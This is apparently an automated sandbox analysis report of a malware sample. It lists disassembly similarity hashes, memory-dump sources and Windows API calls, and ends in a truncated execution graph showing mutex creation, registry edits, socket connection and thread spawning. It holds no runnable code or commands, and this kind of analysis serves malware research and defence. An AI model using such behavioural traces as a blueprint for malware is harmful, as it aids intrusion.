                            • Opcode Fuzzy Hash: ab07537777515488e9e8f57eef12ca18558389b5460dfc982353195e4352bf6a
                            • Instruction Fuzzy Hash: C871B533A39136C6FF25AF2B94C9935E651AF11384FD64939D40987AA1EF2DB410CB21
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: BreakCounterCreateDebugEventPerformanceQuery
                            • String ID:
                            • API String ID: 4239280443-0
                            • Opcode ID: 252cd89e4528406686be57cf00f60d5450300994312d88c791e533677183f503
                            • Instruction ID: 7e11cbe2fc307975061f38a8f6694187e18512c8050fd57b32620a6a6c901e88
                            • Opcode Fuzzy Hash: 252cd89e4528406686be57cf00f60d5450300994312d88c791e533677183f503
                            • Instruction Fuzzy Hash: 7E420C33D38B82D5E700EF26B8C0265B7A4FB59748F95923AD98C22765DF3CA091D361
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: 3af64f1d3e18b5226ba85596036ff583db5a1ecd88759b32c0d3579c6f4f138e
                            • Instruction ID: 8c42a6e03b906a50fcab5616d7a30ff3cce33b6443dcc6bdd1a8577e418b6fbf
                            • Opcode Fuzzy Hash: 3af64f1d3e18b5226ba85596036ff583db5a1ecd88759b32c0d3579c6f4f138e
                            • Instruction Fuzzy Hash: 5B529133A39B82D5EB149F06E880679B3A1FB45798F954236DA6D43794EF3CE450C321
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID: ?
                            • API String ID: 0-1684325040
                            • Opcode ID: 1fe4063cd8a7627479a9be527d78d8baf63d271df9d58fc4a7a5da7ffb6242fc
                            • Instruction ID: dee22986f870838c1ceb39062dfd4053a385c5bb0fdda3284e72c50bdd402ce5
                            • Opcode Fuzzy Hash: 1fe4063cd8a7627479a9be527d78d8baf63d271df9d58fc4a7a5da7ffb6242fc
                            • Instruction Fuzzy Hash: 3B12C333A38A81C2EA10EF16E480A7AE3B5FB64B94FA54632DA5D47794DF3CE441C710
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fbbfacb1d8f9f6609acfa47c3662894f093c3c4e861cb0b99195e5338392d3b5
                            • Instruction ID: 3813e2baabd15f9988b4be4c20b032b117a35e2a45ba54556b6885f924d4db3e
                            • Opcode Fuzzy Hash: fbbfacb1d8f9f6609acfa47c3662894f093c3c4e861cb0b99195e5338392d3b5
                            • Instruction Fuzzy Hash: E392D163E39B42D5EA01BF17A9D0AB4E395AF45BC8FA58136D80E53360EF3DE4458321
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bb0bdc50d0a79732d1fbaaf7e6b7a9e629728ad14d5191bc8c1cbe51083c7122
                            • Instruction ID: 37d39b1818be0cb40298de0fb7d1e80c13859778f0d88a8332af966ac45354dd
                            • Opcode Fuzzy Hash: bb0bdc50d0a79732d1fbaaf7e6b7a9e629728ad14d5191bc8c1cbe51083c7122
                            • Instruction Fuzzy Hash: 8B42AC33F38B42C6EB109F26E4805A9B7A1FB45B88BA54536EE4D17B98DE38E451C710
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1fb2c77b25ed1ccfa3b74ae9a7e59123a7fd091295756a8848aa9ea6743a7ee8
                            • Instruction ID: 78b57566d92488243571465de233ebf3bf540f1320405981882d13c885a44a72
                            • Opcode Fuzzy Hash: 1fb2c77b25ed1ccfa3b74ae9a7e59123a7fd091295756a8848aa9ea6743a7ee8
                            • Instruction Fuzzy Hash: BB32D373F78B45CAEB10DF66D880AACB7A1EB05788BA54136CE0D57B88DE38E455C350
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 874d07d0b63e12727b284f3094aca6d283b2919d332a0d816e76fe305952f5ec
                            • Instruction ID: d13da4f178f63b671cfd210f347025ba895e83d6917bb16506c80dc83f50609b
                            • Opcode Fuzzy Hash: 874d07d0b63e12727b284f3094aca6d283b2919d332a0d816e76fe305952f5ec
                            • Instruction Fuzzy Hash: F602CA73B38A85C6EA149F16D480A79B790EB85BA4F918232CB6D677D5CF3CE441D320
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CounterPerformanceQuery
                            • String ID:
                            • API String ID: 2783962273-0
                            • Opcode ID: e816d686233bc00fa271f6222e436da18f7514f741235fe5f6e969e94f8297b3
                            • Instruction ID: 52fcc93506b83f67c9532f95ed15a8f70c06504bf21bef9f5730929746c1fdb8
                            • Opcode Fuzzy Hash: e816d686233bc00fa271f6222e436da18f7514f741235fe5f6e969e94f8297b3
                            • Instruction Fuzzy Hash: 0302B523A39B83D5EB51AF2694D0734A7B0BF49748FA58636DA4D133A1DF3CE4918220
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1234fb6fc9fdbe2454c2e37c2c00e3cb25b3c3dd0762fcc38499df4434799227
                            • Instruction ID: 05252e362dd8856b9ff4833a34f503226f896dc7729f185ea1abadb0d7a47bef
                            • Opcode Fuzzy Hash: 1234fb6fc9fdbe2454c2e37c2c00e3cb25b3c3dd0762fcc38499df4434799227
                            • Instruction Fuzzy Hash: 86E1B073A39745D6EB95AF16D480738B7E1FB45B84F95823AC90E43294EF3DE0858321
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                             • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmp
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            Similarity
                            • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                            • String ID: InitializeContext2$kernel32.dll
                            • API String ID: 4102459504-3117029998
                            Similarity
                            • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
                            • String ID: QueueUserAPC2$kernel32
                            • API String ID: 3714266957-4022151419
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            Similarity
                            • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                            • String ID:
                            • API String ID: 510365852-3916222277
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            Similarity
                            • API ID: ExceptionFailFastRaise
                            • String ID: Process is terminating due to StackOverflowException.
                            • API String ID: 2546344036-2200901744
                            APIs
                            • LoadLibraryExW.KERNEL32(?,?,?,?,00000145BC000000,00007FF774A430AD,?,?,00000000,00007FF774A2FA9C,?,FFFFFFFF,47AE147AE147AE15,00007FF774A1964C), ref: 00007FF774A43002
                            • GetProcAddress.KERNEL32(?,?,?,?,00000145BC000000,00007FF774A430AD,?,?,00000000,00007FF774A2FA9C,?,FFFFFFFF,47AE147AE147AE15,00007FF774A1964C), ref: 00007FF774A4301C
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetEnabledXStateFeatures$kernel32.dll
                            • API String ID: 2574300362-4754247
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetEnabledXStateFeatures$kernel32
                            • API String ID: 2574300362-4273408117
                            APIs
                            Strings
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetEnabledXStateFeatures$kernel32
                            • API String ID: 2574300362-4273408117
                            APIs
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            APIs
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            APIs
                            Similarity
                            • API ID: BreakDebug
                            • String ID:
                            • API String ID: 456121617-0
                            APIs
                            Similarity
                            • API ID: BreakDebug
                            • String ID:
                            • API String ID: 456121617-0
                            APIs
                            • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF774A06431), ref: 00007FF774A0AD34
                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF774A06431), ref: 00007FF774A0AD3E
                            • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF774A06431), ref: 00007FF774A0AD5D
                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF774A06431), ref: 00007FF774A0AD71
                            Similarity
                            • API ID: ErrorLastMultipleWait$HandlesObjects
                            • String ID:
                            • API String ID: 2817213684-0
                            APIs
                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF774A69A6B), ref: 00007FF774A6A930
                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF774A69A6B), ref: 00007FF774A6A971
                            Strings
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            APIs
                            • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF774A1D516,?,-8000000000000000,00000001,00007FF774A2C6D6), ref: 00007FF774A316EA
                            • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF774A1D516,?,-8000000000000000,00000001,00007FF774A2C6D6), ref: 00007FF774A31759
                            • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF774A1D516,?,-8000000000000000,00000001,00007FF774A2C6D6), ref: 00007FF774A317A2
                            • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF774A1D516,?,-8000000000000000,00000001,00007FF774A2C6D6), ref: 00007FF774A317B8
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            APIs
                            • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF774A23F8F,?,?,?,00007FF774A3025A), ref: 00007FF774A23E5A
                            • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF774A23F8F,?,?,?,00007FF774A3025A), ref: 00007FF774A23E9C
                            • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF774A23F8F,?,?,?,00007FF774A3025A), ref: 00007FF774A23EC7
                            • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF774A23F8F,?,?,?,00007FF774A3025A), ref: 00007FF774A23EE8
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0

                            Execution Graph

                            Execution Coverage:4.1%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:4.5%
                            Total number of Nodes:1361
                            Total number of Limit Nodes:60
48198 402055 47751->48198 47754 401fe2 47755 401ff1 47754->47755 47762 402039 47754->47762 47756 4023ce 11 API calls 47755->47756 47757 401ffa 47756->47757 47758 40203c 47757->47758 47760 402015 47757->47760 47759 40267a 11 API calls 47758->47759 47759->47762 48230 403098 28 API calls 47760->48230 47763 401fd8 47762->47763 47764 4023ce 11 API calls 47763->47764 47765 401fe1 47764->47765 47765->47347 47767 401fd2 47766->47767 47768 401fc9 47766->47768 47767->47353 48231 4025e0 28 API calls 47768->48231 48232 401fab 47770->48232 47772 40d073 CreateMutexA GetLastError 47772->47369 48233 41bfb7 47773->48233 47778 401fe2 28 API calls 47779 41b2ff 47778->47779 47780 401fd8 11 API calls 47779->47780 47781 41b307 47780->47781 47782 4135a6 31 API calls 47781->47782 47784 41b35d 47781->47784 47783 41b330 47782->47783 47785 41b33b StrToIntA 47783->47785 47784->47376 47786 41b349 47785->47786 47789 41b352 47785->47789 48241 41cf69 22 API calls 47786->48241 47788 401fd8 11 API calls 47788->47784 47789->47788 47791 40772a 47790->47791 47792 413549 3 API calls 47791->47792 47793 407731 47792->47793 47793->47386 47793->47387 47795 41bc72 47794->47795 48242 40b904 47795->48242 47797 41bc7a 47797->47403 47799 401f22 47798->47799 47800 401f6a 47798->47800 47801 402252 11 API calls 47799->47801 47807 401f09 47800->47807 47802 401f2b 47801->47802 47803 401f6d 47802->47803 47804 401f46 47802->47804 48275 402336 47803->48275 48274 40305c 28 API calls 47804->48274 47808 402252 11 API calls 47807->47808 47809 401f12 47808->47809 47809->47416 47811 413965 47810->47811 47812 406dd8 28 API calls 47811->47812 47813 41397a 47812->47813 47814 4020f6 28 API calls 47813->47814 47815 41398a 47814->47815 47816 41376f 14 API calls 47815->47816 47817 413994 47816->47817 47818 401fd8 11 API calls 47817->47818 47819 4139a1 47818->47819 47819->47464 47821 40209b 47820->47821 47822 4023ce 11 API calls 47821->47822 47823 4020a6 47822->47823 48279 4024ed 47823->48279 47827 413788 47826->47827 47828 4137bf 
47826->47828 47831 41379a RegSetValueExA RegCloseKey 47827->47831 47829 401fd8 11 API calls 47828->47829 47830 40ef9e 47829->47830 47830->47466 47831->47828 47833 43bac5 _strftime 47832->47833 48283 43ae03 47833->48283 47835 40efb7 47835->47472 47835->47474 47837 41b5a0 47836->47837 47838 41b505 GetLocalTime 47836->47838 47840 401fd8 11 API calls 47837->47840 47839 40531e 28 API calls 47838->47839 47842 41b547 47839->47842 47841 41b5a8 47840->47841 47843 401fd8 11 API calls 47841->47843 47844 406383 28 API calls 47842->47844 47845 40f00d 47843->47845 47846 41b553 47844->47846 47845->47490 48311 402f10 47846->48311 47849 406383 28 API calls 47850 41b56b 47849->47850 48316 407200 77 API calls 47850->48316 47852 41b579 47853 401fd8 11 API calls 47852->47853 47854 41b585 47853->47854 47855 401fd8 11 API calls 47854->47855 47856 41b58e 47855->47856 47857 401fd8 11 API calls 47856->47857 47858 41b597 47857->47858 47859 401fd8 11 API calls 47858->47859 47859->47837 47861 409e02 _wcslen 47860->47861 47862 409e24 47861->47862 47863 409e0d 47861->47863 47865 40da34 31 API calls 47862->47865 47864 40da34 31 API calls 47863->47864 47866 409e15 47864->47866 47867 409e2c 47865->47867 47868 401f13 28 API calls 47866->47868 47869 401f13 28 API calls 47867->47869 47884 409e1f 47868->47884 47870 409e3a 47869->47870 47871 401f09 11 API calls 47870->47871 47872 409e42 47871->47872 48335 40915b 28 API calls 47872->48335 47873 401f09 11 API calls 47875 409e79 47873->47875 48320 40a109 47875->48320 47876 409e54 48336 403014 47876->48336 47881 401f13 28 API calls 47882 409e69 47881->47882 47883 401f09 11 API calls 47882->47883 47883->47884 47884->47873 48388 40417e 47885->48388 47890 403014 28 API calls 47891 41b672 47890->47891 47892 401f09 11 API calls 47891->47892 47893 41b67b 47892->47893 47894 401f09 11 API calls 47893->47894 47895 40f223 47894->47895 47895->47543 47897 413520 RegQueryValueExA RegCloseKey 47896->47897 47898 40f2e4 47896->47898 47897->47898 47898->47415 47898->47571 
47900 40f392 47899->47900 47901 413a3f RegDeleteValueW 47899->47901 47900->47410 47901->47900 47903 40dd5b 47902->47903 47904 4134ff 3 API calls 47903->47904 47905 40dd62 47904->47905 47909 40dd81 47905->47909 48482 401707 47905->48482 47907 40dd6f 48485 413877 RegCreateKeyA 47907->48485 47910 414f2a 47909->47910 47911 4020df 11 API calls 47910->47911 47912 414f3e 47911->47912 48499 41b8b3 47912->48499 47915 4020df 11 API calls 47916 414f54 47915->47916 47917 401e65 22 API calls 47916->47917 47918 414f62 47917->47918 47919 43baac _strftime 40 API calls 47918->47919 47920 414f6f 47919->47920 47921 414f81 47920->47921 47922 414f74 Sleep 47920->47922 47923 402093 28 API calls 47921->47923 47922->47921 47924 414f90 47923->47924 47925 401e65 22 API calls 47924->47925 47926 414f99 47925->47926 47927 4020f6 28 API calls 47926->47927 47928 414fa4 47927->47928 47929 41be1b 28 API calls 47928->47929 47930 414fac 47929->47930 48503 40489e WSAStartup 47930->48503 47932 414fb6 47933 401e65 22 API calls 47932->47933 47934 414fbf 47933->47934 47935 401e65 22 API calls 47934->47935 47984 41503e 47934->47984 47936 414fd8 47935->47936 47938 401e65 22 API calls 47936->47938 47937 4020f6 28 API calls 47937->47984 47939 414fe9 47938->47939 47941 401e65 22 API calls 47939->47941 47940 41be1b 28 API calls 47940->47984 47942 414ffa 47941->47942 47943 401e65 22 API calls 47942->47943 47945 41500b 47943->47945 47944 406c1e 28 API calls 47944->47984 47947 401e65 22 API calls 47945->47947 47946 401fe2 28 API calls 47946->47984 47948 41501c 47947->47948 47949 401e65 22 API calls 47948->47949 47950 41502e 47949->47950 48649 40473d 89 API calls 47950->48649 47952 41b4ef 80 API calls 47952->47984 47954 41518c WSAGetLastError 48650 41cae1 30 API calls 47954->48650 47959 41519c 47961 402093 28 API calls 47959->47961 47962 41b4ef 80 API calls 47959->47962 47966 401e65 22 API calls 47959->47966 47967 401e8d 11 API calls 47959->47967 47969 43baac _strftime 40 API calls 47959->47969 47959->47984 48004 
415a71 CreateThread 47959->48004 48005 401fd8 11 API calls 47959->48005 48006 401f09 11 API calls 47959->48006 48651 4052fd 28 API calls 47959->48651 48653 40b051 85 API calls 47959->48653 48654 404e26 99 API calls 47959->48654 47961->47959 47962->47959 47964 401e65 22 API calls 47964->47984 47965 40531e 28 API calls 47965->47984 47966->47959 47967->47959 47968 402f10 28 API calls 47968->47984 47970 415acf Sleep 47969->47970 47970->47959 47971 406383 28 API calls 47971->47984 47972 402093 28 API calls 47972->47984 47973 401fd8 11 API calls 47973->47984 47976 40905c 28 API calls 47976->47984 47978 4136f8 3 API calls 47978->47984 47979 4135a6 31 API calls 47979->47984 47980 40417e 28 API calls 47980->47984 47984->47937 47984->47940 47984->47944 47984->47946 47984->47952 47984->47954 47984->47959 47984->47964 47984->47965 47984->47968 47984->47971 47984->47972 47984->47973 47984->47976 47984->47978 47984->47979 47984->47980 47986 401e65 22 API calls 47984->47986 48504 414ee9 47984->48504 48509 40482d 47984->48509 48516 404f51 47984->48516 48531 4048c8 connect 47984->48531 48591 41b7e0 47984->48591 48594 4145bd 47984->48594 48597 441e81 47984->48597 48601 40dd89 47984->48601 48607 41bc42 47984->48607 48610 41bd1e 47984->48610 48614 41bb8e 47984->48614 47987 415439 GetTickCount 47986->47987 47988 41bb8e 28 API calls 47987->47988 48000 415456 47988->48000 47990 41bb8e 28 API calls 47990->48000 47992 41bd1e 28 API calls 47992->48000 47995 402f10 28 API calls 47995->48000 47996 406383 28 API calls 47996->48000 47997 402ea1 28 API calls 47997->48000 47999 401fd8 11 API calls 47999->48000 48000->47990 48000->47992 48000->47995 48000->47996 48000->47997 48000->47999 48001 401f09 11 API calls 48000->48001 48619 41bae6 48000->48619 48621 41ba96 48000->48621 48626 40f8d1 GetLocaleInfoA 48000->48626 48629 402f31 28 API calls 48000->48629 48630 404c10 48000->48630 48652 404aa1 61 API calls ctype 48000->48652 48001->48000 48004->47959 48805 41ad17 105 API calls 48004->48805 
48005->47959 48006->47959 48007->47328 48008->47336 48009->47340 48012 4020df 11 API calls 48011->48012 48013 406c2a 48012->48013 48014 4032a0 28 API calls 48013->48014 48015 406c47 48014->48015 48015->47361 48017 40eba4 48016->48017 48018 413573 RegQueryValueExA RegCloseKey 48016->48018 48017->47358 48017->47375 48018->48017 48019->47364 48020->47394 48021->47387 48022->47378 48023->47392 48806 401f86 48024->48806 48027 40da70 48810 41b5b4 29 API calls 48027->48810 48028 40daa5 48031 41bfb7 GetCurrentProcess 48028->48031 48029 40db99 GetLongPathNameW 48033 40417e 28 API calls 48029->48033 48030 40da66 48030->48029 48034 40daaa 48031->48034 48037 40dbae 48033->48037 48038 40db00 48034->48038 48039 40daae 48034->48039 48035 40da79 48036 401f13 28 API calls 48035->48036 48040 40da83 48036->48040 48041 40417e 28 API calls 48037->48041 48042 40417e 28 API calls 48038->48042 48043 40417e 28 API calls 48039->48043 48047 401f09 11 API calls 48040->48047 48044 40dbbd 48041->48044 48045 40db0e 48042->48045 48046 40dabc 48043->48046 48813 40ddd1 28 API calls 48044->48813 48051 40417e 28 API calls 48045->48051 48052 40417e 28 API calls 48046->48052 48047->48030 48049 40dbd0 48814 402fa5 28 API calls 48049->48814 48055 40db24 48051->48055 48053 40dad2 48052->48053 48811 